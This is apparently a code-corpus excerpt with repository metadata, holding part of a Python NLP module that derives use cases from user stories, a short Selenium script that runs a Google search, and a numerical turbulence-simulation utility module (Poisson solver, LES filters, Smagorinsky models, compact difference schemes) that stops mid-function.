exclusion = getDomainSpecificWords()
return any(element in words for element in exclusion)
def conductUseCasesAnalysis(order):
cleanedActors = cleanActors(order["userStories"])
cleanedStories = findSynonymsAndTransferStories(cleanedActors)
actorUseCases = getUseCasesFromStories(cleanedStories)
return refineActorUseCases(actorUseCases)
def cleanActors(stories):
cleaned = list()
for story in stories:
actor = nlp(story["role"].lower())
actorName = list()
# In case no obvious nouns are recognised or if some nouns are misclassified (e.g. a cook/to cook)
if len([noun for noun in actor.noun_chunks]) == 0:
actorName.append(story["role"].lower())
else:
for chunk in actor.noun_chunks:
actorName.append(chunk.lemma_ if not verifyPhraseDomainWords(chunk.text) else chunk.text)
cleaned.append({"id": story["_id"], "actor": " ".join(actorName), "action": story["action"]})
return cleaned
def removeDuplicates(values):
return list(dict.fromkeys(values))
def getAllActors(stories):
actors = list()
for story in stories:
actors.append(story["actor"])
return removeDuplicates(actors)
def getAllStoriesOfActor(stories, actor):
return [item for item in stories if item.get("actor") == actor]
# This function looks for synonyms among the names of actors. If a synonym is detected, one name for both
# actors is selected and the standardised name replaces the synonym in all user stories.
def findSynonymsAndTransferStories(stories):
def finaliseActorStories(allStories, cleanedActor, currentIDs):
processedStories = list()
processedIDs = list()
storiesRetrieved = getAllStoriesOfActor(allStories, cleanedActor)
for storyToProcess in storiesRetrieved:
if not storyToProcess["id"] in currentIDs:
processedStories.append({"actor": cleanedActor.capitalize(), "action": storyToProcess["action"]})
processedIDs.append(storyToProcess["id"])
return {"processedStories": processedStories, "processedIDs": processedIDs}
cleanedStories = list()
ids = list()
actors = getAllActors(stories)
for index, actor in enumerate(actors):
actorsToReplace = [actor]
actorSynonyms = []
try:
actorSynonyms = wordnet.synset(str(actor) + ".n.01")
except WordNetError:
pass
# Check if the object has an attribute lemmas. In case synset failed to identify the word
# (e.g. when it's a compound noun or a neologism), the object won't have any lemmas and
# the stories for that actor will be processed and finalised without further steps.
if not hasattr(actorSynonyms, "lemmas"):
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
# Processes and finalises stories for the actor word, if the word has no known synonyms found by synset
if len(actorSynonyms.lemmas()) == 1:
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
# If synset identified synonyms for the actor word, all other actor words are checked to verify whether
# some actor words are synonymic. In such a case, the similarity score between them will be 1.0.
for nextActor in actors[index+1:]:
nextActorSynonyms = []
try:
nextActorSynonyms = wordnet.synset(str(nextActor) + ".n.01")
except WordNetError:
pass
if not hasattr(nextActorSynonyms, "lemmas"):
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
if len(nextActorSynonyms.lemmas()) == 1:
finalisedStories = finaliseActorStories(stories, actor, ids)
cleanedStories.extend(finalisedStories["processedStories"])
ids.extend(finalisedStories["processedIDs"])
continue
# If the next actor word is valid as per synset and has synonyms, the similarity between
# the next actor word and the one currently in question is assessed.
similarityScore = actorSynonyms.wup_similarity(nextActorSynonyms)
# If the actor words are synonyms, replace the next actor word with the current one in all stories
if similarityScore == 1.0:
actorsToReplace.append(nextActor)
# After all the following actor words are checked against the current actor word, the synonymic actors
# will be replaced with the current actor words for every user story
for actorToReplace in actorsToReplace:
allActorStories = getAllStoriesOfActor(stories, actorToReplace)
for storyToAppend in allActorStories:
if not storyToAppend["id"] in ids:
cleanedStories.append({"actor": actor.capitalize(), "action": storyToAppend["action"]})
ids.append(storyToAppend["id"])
return cleanedStories
def getUseCasesFromStories(stories):
actorsWithUseCases = list()
storiesOnly = list()
# The list of parts of speech that will be omitted from the action sentence
exclusionRule = getPOSExclusion()
for index, story in enumerate(stories):
# Pre-processing, remove any unnecessary punctuation
storyAction = removePunctuation(story["action"])
# Pre-processing, remove benefit from sentence
storyNoBenefit = recogniseAndRemoveBenefit(nlp, storyAction)
# Pre-processing, tokenizing words in a sentence
tokens = word_tokenize(storyNoBenefit)
# Part-of-speech tagging of each word in a sentence
taggedWords = pos_tag(tokens)
for i, word in enumerate(taggedWords):
# Excluding words that are of a speech part included in the exclusion rule
if word[1] in exclusionRule and word[0] != "not" and i != 0:
taggedWords.pop(i)
firstAction = list()
for i, word in enumerate(taggedWords):
firstAction.append(word[0])
firstAction[0] = firstAction[0].capitalize()
actorInList = False
finalStory = " ".join(firstAction)
storiesOnly.append(finalStory)
for sublist in actorsWithUseCases:
if sublist["actor"] == story["actor"]:
sublist["useCases"] = [*sublist["useCases"], {"useCase": finalStory, "core": list()}]
actorInList = True
if not actorInList:
actorsWithUseCases.append({"actor": story["actor"], "useCases": [{"useCase": finalStory, "core": list()}]})
return {"actorsWithUseCases": actorsWithUseCases}
def refineActorUseCases(actorsWithUseCases):
refinedActorUseCases = copy.deepcopy(actorsWithUseCases)["actorsWithUseCases"]
dependency = getDependencyPhrases()
for actorIdx, actor in enumerate(refinedActorUseCases):
for storyIdx, story in enumerate(actor["useCases"]):
useCasesDoc = nlp(story["useCase"])
for tokenIdx, token in enumerate(useCasesDoc):
if token.dep_ == dependency["ROOT"] or tokenIdx == 0:
refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
elif token.dep_ == dependency["CONJUGATION"] and token.head.dep_ == dependency["ROOT"]:
refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
elif token.dep_ == dependency["DIRECT_OBJECT"] and (token.head.dep_ == dependency["ROOT"] or token.head.dep_ == dependency["CONJUGATION"]):
refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
elif token.dep_ == dependency["DIRECT_OBJECT"] and token.head.dep_ == dependency["CLAUSAL_COMPLEMENT"] and token.head.head.dep_ == dependency["ROOT"] and token.pos_ != "DET":
refinedActorUseCases[actorIdx]["useCases"][storyIdx]["core"].append(tokenIdx)
return refinedActorUseCases
|
[
"wojtunikdw@gmail.com"
] |
wojtunikdw@gmail.com
|
5b384065ee295c094d90ceb2aaf40d6d07405bed
|
f9a12a55058bca917d794e47151dc62fd0593e74
|
/testCases/search_functionality.py
|
ab4230c8063f72ad3f87a5e291d33249ad2f2a62
|
[] |
no_license
|
RakshaKShetty/google_search_Func
|
a206f4c20fd31533f06ff862c14cb55eb98cd9d2
|
ab64958b975ef530a8c93495ef32c00195e52ee1
|
refs/heads/main
| 2023-04-10T17:45:21.120518
| 2021-04-01T05:03:09
| 2021-04-01T05:03:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
from selenium import webdriver
import time
from selenium.webdriver.common.keys import Keys
driver = webdriver.Chrome(executable_path=r"D:\Drivers\chromedriver.exe")
driver.set_page_load_timeout(10)  # timeout in seconds, passed as an int
driver.get("https://www.google.com/")
driver.maximize_window()
que = driver.find_element_by_name("q")
que.send_keys("Software Testing")
time.sleep(3)
que.send_keys(Keys.ARROW_DOWN)
que.send_keys(Keys.RETURN)
|
[
"rasharaksha@gmail.com"
] |
rasharaksha@gmail.com
|
ea01c65d112a128bd1b7639e3c9175ad83806d63
|
c3ead530bd898c3cf42b3687ae74911bd02bdb7a
|
/turbulence_closure_les/utils.py
|
45b2c7094c1c3a564e56ffbe29ccb031687afb9a
|
[] |
no_license
|
chandanbose/PAR-RL
|
19fc2b545de7a0cd10bb9efee307b7b211fa9130
|
043fd4f8f4834626c7d400dd4eabfa46521d9320
|
refs/heads/master
| 2022-12-09T05:18:49.366495
| 2020-09-23T17:28:30
| 2020-09-23T17:28:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,406
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 17 21:45:02 2020
@author: suraj
"""
import numpy as np
from numpy.random import seed
seed(1)
import pyfftw
from scipy import integrate
from scipy import linalg
import matplotlib.pyplot as plt
import time as tm
import matplotlib.ticker as ticker
import os
from numba import jit
font = {'family' : 'Times New Roman',
'size' : 14}
plt.rc('font', **font)
import matplotlib as mpl
mpl.rcParams['text.usetex'] = True
mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}']
#%%
@jit
def bc(nx,ny,u):
u[:,0] = u[:,ny]
u[:,1] = u[:,ny+1]
u[:,ny+3] = u[:,3]
u[:,ny+4] = u[:,4]
u[0,:] = u[nx,:]
u[1,:] = u[nx+1,:]
u[nx+3,:] = u[3,:]
u[nx+4,:] = u[4,:]
return u
#%%
# fast poisson solver using second-order central difference scheme
def fpsd(nx, ny, dx, dy, f):
epsilon = 1.0e-6
aa = -2.0/(dx*dx) - 2.0/(dy*dy)
bb = 2.0/(dx*dx)
cc = 2.0/(dy*dy)
hx = 2.0*np.pi/np.float64(nx)
hy = 2.0*np.pi/np.float64(ny)
kx = np.empty(nx)
ky = np.empty(ny)
kx[:] = hx*np.float64(np.arange(0, nx))
ky[:] = hy*np.float64(np.arange(0, ny))
kx[0] = epsilon
ky[0] = epsilon
kx, ky = np.meshgrid(np.cos(kx), np.cos(ky), indexing='ij')
data = np.empty((nx,ny), dtype='complex128')
data1 = np.empty((nx,ny), dtype='complex128')
data[:,:] = np.vectorize(complex)(f[0:nx,0:ny],0.0)
a = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
b = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
fft_object = pyfftw.FFTW(a, b, axes = (0,1), direction = 'FFTW_FORWARD')
fft_object_inv = pyfftw.FFTW(a, b,axes = (0,1), direction = 'FFTW_BACKWARD')
e = fft_object(data)
#e = pyfftw.interfaces.scipy_fftpack.fft2(data)
e[0,0] = 0.0
data1[:,:] = e[:,:]/(aa + bb*kx[:,:] + cc*ky[:,:])
ut = np.real(fft_object_inv(data1))
#periodicity
u = np.empty((nx+1,ny+1))
u[0:nx,0:ny] = ut
u[:,ny] = u[:,0]
u[nx,:] = u[0,:]
u[nx,ny] = u[0,0]
return u
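# Usage sketch: solve the periodic Poisson problem laplacian(u) = f with the
# manufactured solution u = sin(x)*sin(y), i.e. f = -2*sin(x)*sin(y):
#   nx = ny = 64; dx = dy = 2.0*np.pi/nx
#   x1 = np.linspace(0.0, 2.0*np.pi, nx+1)
#   X, Y = np.meshgrid(x1, x1, indexing='ij')
#   u = fpsd(nx, ny, dx, dy, -2.0*np.sin(X)*np.sin(Y))   # ~ sin(X)*sin(Y)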
#%%
@jit
def les_filter(nx,ny,nxc,nyc,u):
'''
coarsen the solution field keeping the size of the data same
Inputs
------
nx,ny : number of grid points in x and y direction on fine grid
nxc,nyc : number of grid points in x and y direction on coarse grid
u : solution field on fine grid
Output
------
uc : coarsened solution field [nx+1, ny+1]
'''
uf = np.fft.fft2(u[0:nx,0:ny])
uf[int(nxc/2):int(nx-nxc/2),:] = 0.0
uf[:,int(nyc/2):int(ny-nyc/2)] = 0.0
utc = np.real(np.fft.ifft2(uf))
uc = np.zeros((nx+1,ny+1))
uc[0:nx,0:ny] = utc
# periodic bc
uc[:,ny] = uc[:,0]
uc[nx,:] = uc[0,:]
uc[nx,ny] = uc[0,0]
return uc
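# Usage sketch: keep only the lowest 16x16 Fourier modes of a 64x64 periodic
# field while leaving the array size unchanged:
#   nx = ny = 64
#   x1 = np.linspace(0.0, 2.0*np.pi, nx+1)
#   X, Y = np.meshgrid(x1, x1, indexing='ij')
#   u = np.sin(X) + np.sin(8.0*X)*np.sin(8.0*Y)
#   uc = les_filter(nx, ny, 16, 16, u)   # high-wavenumber part is removed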
#%%
def grad_spectral(nx,ny,u):
'''
compute the gradient of u using spectral differentiation
Inputs
------
nx,ny : number of grid points in x and y direction on fine grid
u : solution field
Output
------
ux : du/dx (size = [nx+1,ny+1])
uy : du/dy (size = [nx+1,ny+1])
'''
ux = np.empty((nx+1,ny+1))
uy = np.empty((nx+1,ny+1))
uf = np.fft.fft2(u[0:nx,0:ny])
kx = np.fft.fftfreq(nx,1/nx)
ky = np.fft.fftfreq(ny,1/ny)
kx = kx.reshape(nx,1)
ky = ky.reshape(1,ny)
uxf = 1.0j*kx*uf
uyf = 1.0j*ky*uf
ux[0:nx,0:ny] = np.real(np.fft.ifft2(uxf))
uy[0:nx,0:ny] = np.real(np.fft.ifft2(uyf))
# periodic bc
ux[:,ny] = ux[:,0]
ux[nx,:] = ux[0,:]
ux[nx,ny] = ux[0,0]
# periodic bc
uy[:,ny] = uy[:,0]
uy[nx,:] = uy[0,:]
uy[nx,ny] = uy[0,0]
return ux,uy
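# Sanity-check sketch: the spectral derivative of sin(x) on a periodic grid
# should match cos(x) to near machine precision:
#   nx = ny = 32
#   x1 = np.linspace(0.0, 2.0*np.pi, nx+1)
#   X, Y = np.meshgrid(x1, x1, indexing='ij')
#   ux, uy = grad_spectral(nx, ny, np.sin(X))   # ux ~ cos(X), uy ~ 0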
#%%
def dyn_smag(nx,ny,kappa,sc,wc):
'''
    compute the eddy viscosity using Germano's dynamic procedure with
    Lilly's least-squares approximation
    Inputs
    ------
    nx,ny : number of grid points in x and y direction on fine grid
    kappa : sub-filter grid filter ratio
wc : vorticity on LES grid
sc : streamfunction on LES grid
Output
------
ev : (cs*delta)**2*|S| (size = [nx+1,ny+1])
'''
nxc = int(nx/kappa)
nyc = int(ny/kappa)
scc = les_filter(nx,ny,nxc,nyc,sc[2:nx+3,2:ny+3])
wcc = les_filter(nx,ny,nxc,nyc,wc[2:nx+3,2:ny+3])
scx,scy = grad_spectral(nx,ny,sc[2:nx+3,2:ny+3])
wcx,wcy = grad_spectral(nx,ny,wc[2:nx+3,2:ny+3])
wcxx,wcxy = grad_spectral(nx,ny,wcx)
wcyx,wcyy = grad_spectral(nx,ny,wcy)
scxx,scxy = grad_spectral(nx,ny,scx)
scyx,scyy = grad_spectral(nx,ny,scy)
dac = np.sqrt(4.0*scxy**2 + (scxx - scyy)**2) # |\bar(s)|
dacc = les_filter(nx,ny,nxc,nyc,dac) # |\tilde{\bar{s}}| = \tilde{|\bar(s)|}
sccx,sccy = grad_spectral(nx,ny,scc)
wccx,wccy = grad_spectral(nx,ny,wcc)
wccxx,wccxy = grad_spectral(nx,ny,wccx)
wccyx,wccyy = grad_spectral(nx,ny,wccy)
scy_wcx = scy*wcx
scx_wcy = scx*wcy
scy_wcx_c = les_filter(nx,ny,nxc,nyc,scy_wcx)
scx_wcy_c = les_filter(nx,ny,nxc,nyc,scx_wcy)
h = (sccy*wccx - sccx*wccy) - (scy_wcx_c - scx_wcy_c)
t = dac*(wcxx + wcyy)
tc = les_filter(nx,ny,nxc,nyc,t)
m = kappa**2*dacc*(wccxx + wccyy) - tc
hm = h*m
mm = m*m
CS2 = (np.sum(0.5*(hm + abs(hm)))/np.sum(mm))
ev = CS2*dac
return ev
#%%
def stat_smag(nx,ny,dx,dy,s,cs):
dsdxy = (1.0/(4.0*dx*dy))*(s[1:nx+2,1:ny+2] + s[3:nx+4,3:ny+4] \
-s[3:nx+4,1:ny+2] - s[1:nx+2,3:ny+4])
dsdxx = (1.0/(dx*dx))*(s[3:nx+4,2:ny+3] - 2.0*s[2:nx+3,2:ny+3] \
+s[1:nx+2,2:ny+3])
dsdyy = (1.0/(dy*dy))*(s[2:nx+3,3:ny+4] - 2.0*s[2:nx+3,2:ny+3] \
+s[2:nx+3,1:ny+2])
ev = cs*cs*dx*dy*np.sqrt(4.0*dsdxy*dsdxy + (dsdxx-dsdyy)*(dsdxx-dsdyy))
return ev
#%%
def coarsen(nx,ny,nxc,nyc,u):
'''
coarsen the solution field along with the size of the data
Inputs
------
nx,ny : number of grid points in x and y direction on fine grid
nxc,nyc : number of grid points in x and y direction on coarse grid
u : solution field on fine grid
Output
------
uc : solution field on coarse grid [nxc , nyc]
'''
uf = np.fft.fft2(u[0:nx,0:ny])
ufc = np.zeros((nxc,nyc),dtype='complex')
ufc [0:int(nxc/2),0:int(nyc/2)] = uf[0:int(nxc/2),0:int(nyc/2)]
ufc [int(nxc/2):,0:int(nyc/2)] = uf[int(nx-nxc/2):,0:int(nyc/2)]
ufc [0:int(nxc/2),int(nyc/2):] = uf[0:int(nxc/2),int(ny-nyc/2):]
ufc [int(nxc/2):,int(nyc/2):] = uf[int(nx-nxc/2):,int(ny-nyc/2):]
ufc = ufc*(nxc*nyc)/(nx*ny)
utc = np.real(np.fft.ifft2(ufc))
uc = np.zeros((nxc+1,nyc+1))
uc[0:nxc,0:nyc] = utc
uc[:,nyc] = uc[:,0]
uc[nxc,:] = uc[0,:]
uc[nxc,nyc] = uc[0,0]
return uc
#%%
# compute jacobian using arakawa scheme
# computed at all physical domain points (1:nx+1,1:ny+1; all boundary points included)
# no ghost points
def jacobian(nx,ny,dx,dy,re,w,s):
gg = 1.0/(4.0*dx*dy)
hh = 1.0/3.0
# Arakawa
j1 = gg*( (w[3:nx+4,2:ny+3]-w[1:nx+2,2:ny+3])*(s[2:nx+3,3:ny+4]-s[2:nx+3,1:ny+2]) \
-(w[2:nx+3,3:ny+4]-w[2:nx+3,1:ny+2])*(s[3:nx+4,2:ny+3]-s[1:nx+2,2:ny+3]))
j2 = gg*( w[3:nx+4,2:ny+3]*(s[3:nx+4,3:ny+4]-s[3:nx+4,1:ny+2]) \
- w[1:nx+2,2:ny+3]*(s[1:nx+2,3:ny+4]-s[1:nx+2,1:ny+2]) \
- w[2:nx+3,3:ny+4]*(s[3:nx+4,3:ny+4]-s[1:nx+2,3:ny+4]) \
+ w[2:nx+3,1:ny+2]*(s[3:nx+4,1:ny+2]-s[1:nx+2,1:ny+2]))
j3 = gg*( w[3:nx+4,3:ny+4]*(s[2:nx+3,3:ny+4]-s[3:nx+4,2:ny+3]) \
- w[1:nx+2,1:ny+2]*(s[1:nx+2,2:ny+3]-s[2:nx+3,1:ny+2]) \
- w[1:nx+2,3:ny+4]*(s[2:nx+3,3:ny+4]-s[1:nx+2,2:ny+3]) \
+ w[3:nx+4,1:ny+2]*(s[3:nx+4,2:ny+3]-s[2:nx+3,1:ny+2]) )
jac = (j1+j2+j3)*hh
return jac
#%%
# compute the energy spectrum numerically
def energy_spectrumd(nx,ny,dx,dy,w):
epsilon = 1.0e-6
kx = np.empty(nx)
ky = np.empty(ny)
kx[0:int(nx/2)] = 2*np.pi/(np.float64(nx)*dx)*np.float64(np.arange(0,int(nx/2)))
kx[int(nx/2):nx] = 2*np.pi/(np.float64(nx)*dx)*np.float64(np.arange(-int(nx/2),0))
ky[0:ny] = kx[0:ny]
kx[0] = epsilon
ky[0] = epsilon
kx, ky = np.meshgrid(kx, ky, indexing='ij')
a = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
b = pyfftw.empty_aligned((nx,ny),dtype= 'complex128')
fft_object = pyfftw.FFTW(a, b, axes = (0,1), direction = 'FFTW_FORWARD')
wf = fft_object(w[0:nx,0:ny])
es = np.empty((nx,ny))
kk = np.sqrt(kx[:,:]**2 + ky[:,:]**2)
es[:,:] = np.pi*((np.abs(wf[:,:])/(nx*ny))**2)/kk
n = int(np.sqrt(nx*nx + ny*ny)/2.0)-1
en = np.zeros(n+1)
for k in range(1,n+1):
en[k] = 0.0
ic = 0
ii,jj = np.where((kk[1:,1:]>(k-0.5)) & (kk[1:,1:]<(k+0.5)))
ic = ii.size
ii = ii+1
jj = jj+1
en[k] = np.sum(es[ii,jj])
# for i in range(1,nx):
# for j in range(1,ny):
# kk1 = np.sqrt(kx[i,j]**2 + ky[i,j]**2)
# if ( kk1>(k-0.5) and kk1<(k+0.5) ):
# ic = ic+1
# en[k] = en[k] + es[i,j]
en[k] = en[k]/ic
return en, n
#%%
# compute rhs using arakawa scheme (formulas are based on one ghost point,
# borrowed from fdm solver)
# computed at all physical domain points (1:nx+1,1:ny+1; all boundary points included)
# no ghost points
def rhsa(nx,ny,dx,dy,re,we,se):
aa = 1.0/(dx*dx)
bb = 1.0/(dy*dy)
gg = 1.0/(4.0*dx*dy)
hh = 1.0/3.0
f = np.zeros((nx+5,ny+5))
w = we[1:nx+4,1:ny+4]
s = se[1:nx+4,1:ny+4]
#Arakawa
j1 = gg*( (w[2:nx+3,1:ny+2]-w[0:nx+1,1:ny+2])*(s[1:nx+2,2:ny+3]-s[1:nx+2,0:ny+1]) \
-(w[1:nx+2,2:ny+3]-w[1:nx+2,0:ny+1])*(s[2:nx+3,1:ny+2]-s[0:nx+1,1:ny+2]))
j2 = gg*( w[2:nx+3,1:ny+2]*(s[2:nx+3,2:ny+3]-s[2:nx+3,0:ny+1]) \
- w[0:nx+1,1:ny+2]*(s[0:nx+1,2:ny+3]-s[0:nx+1,0:ny+1]) \
- w[1:nx+2,2:ny+3]*(s[2:nx+3,2:ny+3]-s[0:nx+1,2:ny+3]) \
+ w[1:nx+2,0:ny+1]*(s[2:nx+3,0:ny+1]-s[0:nx+1,0:ny+1]))
j3 = gg*( w[2:nx+3,2:ny+3]*(s[1:nx+2,2:ny+3]-s[2:nx+3,1:ny+2]) \
- w[0:nx+1,0:ny+1]*(s[0:nx+1,1:ny+2]-s[1:nx+2,0:ny+1]) \
- w[0:nx+1,2:ny+3]*(s[1:nx+2,2:ny+3]-s[0:nx+1,1:ny+2]) \
+ w[2:nx+3,0:ny+1]*(s[2:nx+3,1:ny+2]-s[1:nx+2,0:ny+1]) )
jac = (j1+j2+j3)*hh
lap = aa*(w[2:nx+3,1:ny+2]-2.0*w[1:nx+2,1:ny+2]+w[0:nx+1,1:ny+2]) \
+ bb*(w[1:nx+2,2:ny+3]-2.0*w[1:nx+2,1:ny+2]+w[1:nx+2,0:ny+1])
#call Smagorinsky model
#cs = 0.18
#ev = smag(nx,ny,dx,dy,s,cs)
#Central difference for Laplacian
# f[1:nx+2,1:ny+2] = -jac + lap/re + ev*lap if using eddy viscosity model for LES
f[2:nx+3,2:ny+3] = -jac + lap/re
return f
#%% serial compact schemes
#-----------------------------------------------------------------------------#
# Solution to tridiagonal system using Thomas algorithm
#-----------------------------------------------------------------------------#
def tdms(a,b,c,r,s,e):
gam = np.zeros((e+1))
u = np.zeros((e+1))
bet = b[s]
u[s] = r[s]/bet
for i in range(s+1,e+1):
gam[i] = c[i-1]/bet
bet = b[i] - a[i]*gam[i]
u[i] = (r[i] - a[i]*u[i-1])/bet
for i in range(e-1,s-1,-1):
u[i] = u[i] - gam[i+1]*u[i+1]
return u
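# Quick check sketch: a 4x4 tridiagonal system with sub/main/super diagonals
# a, b, c; the exact solution of this particular system is u = [1, 1, 1, 1]:
#   a = np.array([0.0, 1.0, 1.0, 1.0])
#   b = np.array([4.0, 4.0, 4.0, 4.0])
#   c = np.array([1.0, 1.0, 1.0, 0.0])
#   r = np.array([5.0, 6.0, 6.0, 5.0])
#   u = tdms(a, b, c, r, 0, 3)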
#-----------------------------------------------------------------------------#
# Solution to tridiagonal system using cyclic Thomas algorithm
#-----------------------------------------------------------------------------#
def ctdms(a,b,c,alpha,beta,r,s,e):
bb = np.zeros((e+1))
u = np.zeros((e+1))
gamma = -b[s]
bb[s] = b[s] - gamma
bb[e] = b[e] - alpha*beta/gamma
# for i in range(s+1,e):
# bb[i] = b[i]
bb[s+1:e] = b[s+1:e]
x = tdms(a,bb,c,r,s,e)
u[s] = gamma
u[e] = alpha
z = tdms(a,bb,c,u,s,e)
fact = (x[s] + beta*x[e]/gamma)/(1.0 + z[s] + beta*z[e]/gamma)
# for i in range(s,e+1):
# x[i] = x[i] - fact*z[i]
x[s:e+1] = x[s:e+1] - fact*z[s:e+1]
return x
#-----------------------------------------------------------------------------#
#cu3dp: 3rd-order compact upwind scheme for the first derivative(up)
# periodic boundary conditions (0=n), h=grid spacing
# p: free upwind parameter (p>0 for upwind)
# p=0.25 in Zhong (JCP 1998)
#
#-----------------------------------------------------------------------------#
def cu3dp(u,p,h,n):
a = np.zeros((n))
b = np.zeros((n))
c = np.zeros((n))
x = np.zeros((n))
r = np.zeros((n))
up = np.zeros((n+1))
a[:] = 1.0 + p
b[:] = 4.0
c[:] = 1.0 - p
# for i in range(1,n):
# r[i] = ((-3.0-2.0*p)*u[i-1] + 4.0*p*u[i] + (3.0-2.0*p)*u[i+1])/h
r[1:n] = ((-3.0-2.0*p)*u[0:n-1] + 4.0*p*u[1:n] + (3.0-2.0*p)*u[2:n+1])/h
r[0] = ((-3.0-2.0*p)*u[n-1] + 4.0*p*u[0] + (3.0-2.0*p)*u[1])/h
alpha = 1.0 - p
beta = 1.0 + p
x = ctdms(a,b,c,alpha,beta,r,0,n-1)
up[0:n] = x[0:n]
up[n] = up[0]
return up
#-----------------------------------------------------------------------------#
# c4dp: 4th-order compact scheme for the first derivative (up)
# periodic boundary conditions (0=n), h=grid spacing
# tested
#
#-----------------------------------------------------------------------------#
def c4dp(u,h,n):
a = np.zeros((n))
b = np.zeros((n))
c = np.zeros((n))
x = np.zeros((n))
r = np.zeros((n))
up = np.zeros((n+1))
a[:] = 1.0/4.0
b[:] = 1.0
c[:] = 1.0/4.0
# for i in range(1,n):
# r[i] = (3.0/2.0)*(u[i+1] - u[i-1])/(2.0*h)
r[1:n] = (3.0/2.0)*(u[2:n+1] - u[0:n-1])/(2.0*h)
r[0] = (3.0/2.0)*(u[1] - u[n-1])/(2.0*h)
alpha = 1.0/4.0
beta = 1.0/4.0
x = ctdms(a,b,c,alpha,beta,r,0,n-1)
up[0:n] = x[0:n]
up[n] = up[0]
return up
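# Sanity-check sketch: the compact first derivative of sin(x) on a periodic
# grid should reproduce cos(x) with 4th-order accuracy:
#   n = 32; h = 2.0*np.pi/n
#   x1 = np.linspace(0.0, 2.0*np.pi, n+1)
#   up = c4dp(np.sin(x1), h, n)   # up ~ np.cos(x1)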
#-----------------------------------------------------------------------------#
# c4ddp: 4th-order compact scheme for the second derivative (upp)
# periodic boundary conditions (0=n), h=grid spacing
# tested
#
#-----------------------------------------------------------------------------#
def c4ddp(u,h,n):
a = np.zeros((n))
b = np.zeros((n))
c = np.zeros((n))
x = np.zeros((n))
r = np.zeros((n))
upp = np.zeros((n+1))
a[:] = 1.0/10.0
b[:] = 1.0
c[:] = 1.0/10.0
# for i in range(1,n):
# r[i] = (6.0/5.0)*(u[i-1] - 2.0*u[i] + u[i+1])/(h*h)
r[1:n] = (6.0/5.0)*(u[0:n-1] - 2.0*u[1:n] + u[2:n+1])/(h*h)
r[0] = (6.0/5.0)*(u[n-1] - 2.0*u[0] + u[1])/(h*h)
alp = 1.0/10.0
beta = 1.0/10.0
x = ctdms(a,b,c,alp,beta,r,0,n-1)
upp[0:n] = x[0:n]
upp[n] = upp[0]
return upp
#%% rhs
def rhs_cu3(nx,ny,dx,dy,re,pCU3,w,s):
lap = np.zeros((nx+5,ny+5))
jac = np.zeros((nx+5,ny+5))
f = np.zeros((nx+5,ny+5))
# compute wxx
for j in range(2,ny+3):
a = w[2:nx+3,j]
wxx = c4ddp(a,dx,nx)
lap[2:nx+3,j] = wxx[:]
# compute wyy
for i in range(2,nx+3):
a = w[i,2:ny+3]
        wyy = c4ddp(a,dy,ny) # y-direction second derivative uses dy and ny
lap[i,2:ny+3] = lap[i,2:ny+3] + wyy[:]
# Jacobian (convective term): upwind
# sy: u
sy = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = s[i,2:ny+3]
        sy[i-2,:] = c4dp(a,dy,ny) # derivative along y uses dy and ny
# computation of wx
wxp = np.zeros((nx+1,ny+1))
wxn = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = w[2:nx+3,j]
wxp[:,j-2] = cu3dp(a, pCU3, dx, nx) # upwind for wx
wxn[:,j-2] = cu3dp(a, -pCU3, dx, nx) # downwind for wx
# upwinding
syp = np.where(sy>0,sy,0) # max(sy[i,j],0)
syn = np.where(sy<0,sy,0) # min(sy[i,j],0)
# sx: -v
sx = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = s[2:nx+3,j]
sx[:,j-2] = -c4dp(a, dx, nx)
# computation of wy
wyp = np.zeros((nx+1,ny+1))
wyn = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = w[i,2:ny+3]
wyp[i-2,:] = cu3dp(a, pCU3, dy, ny) # upwind for wy
wyn[i-2,:] = cu3dp(a, -pCU3, dy, ny) # downwind for wy
# upwinding
sxp = np.where(sx>0,sx,0) # max(sx[i,j],0)
sxn = np.where(sx<0,sx,0) # min(sx[i,j],0)
jac[2:nx+3,2:ny+3] = (syp*wxp + syn*wxn) + (sxp*wyp + sxn*wyn)
f[2:nx+3,2:ny+3] = -jac[2:nx+3,2:ny+3] + lap[2:nx+3,2:ny+3]/re
del sy, sx, syp, syn, sxp, sxn, wxp, wxn, wyp, wyn
return f
#%%
def rhs_compact(nx,ny,dx,dy,re,w,s):
lap = np.zeros((nx+5,ny+5))
jac = np.zeros((nx+5,ny+5))
f = np.zeros((nx+5,ny+5))
# compute wxx
for j in range(2,ny+3):
a = w[2:nx+3,j]
wxx = c4ddp(a,dx,nx)
lap[2:nx+3,j] = wxx[:]
# compute wyy
for i in range(2,nx+3):
a = w[i,2:ny+3]
        wyy = c4ddp(a,dy,ny) # y-direction second derivative uses dy and ny
lap[i,2:ny+3] = lap[i,2:ny+3] + wyy[:]
# Jacobian (convective term): upwind
# sy
sy = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = s[i,2:ny+3]
        sy[i-2,:] = c4dp(a,dy,ny) # derivative along y uses dy and ny
# computation of wx
wx = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = w[2:nx+3,j]
wx[:,j-2] = c4dp(a,dx,nx)
# sx
sx = np.zeros((nx+1,ny+1))
for j in range(2,ny+3):
a = s[2:nx+3,j]
sx[:,j-2] = c4dp(a, dx, nx)
# computation of wy
wy = np.zeros((nx+1,ny+1))
for i in range(2,nx+3):
a = w[i,2:ny+3]
